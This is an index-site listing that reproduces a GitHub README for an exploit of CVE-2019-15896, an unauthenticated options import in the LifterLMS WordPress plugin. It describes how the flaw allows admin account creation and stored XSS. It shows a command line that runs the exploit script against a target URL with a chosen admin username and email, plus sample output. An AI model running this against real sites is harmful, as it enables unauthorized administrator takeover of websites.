Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/randomrobbiebf/cve-2019-15896

LifterLMS <= 3.34.5 - Unauthenticated Options Import
https://github.com/randomrobbiebf/cve-2019-15896

Last synced: about 1 month ago
JSON representation

LifterLMS <= 3.34.5 - Unauthenticated Options Import

Awesome Lists containing this project

README

        

# CVE-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import

# Description

Unauthenticated Options Import, which could lead to

- Website Redirection

- Administrator Account Creation

- Content Injection

- Stored XSS

The issues have been reported as fixed in 3.35.0. However v3.35.1 added additional input sanitisation and filtering.

How to use
---
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected]
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Exploit By Ramdom Robbie
Once ran check your email for the forgotten password link.
Password reset email sent to [email protected]
```

Info
---

```
Requires access to login.php and working email address and the site needs to be able to send emails
```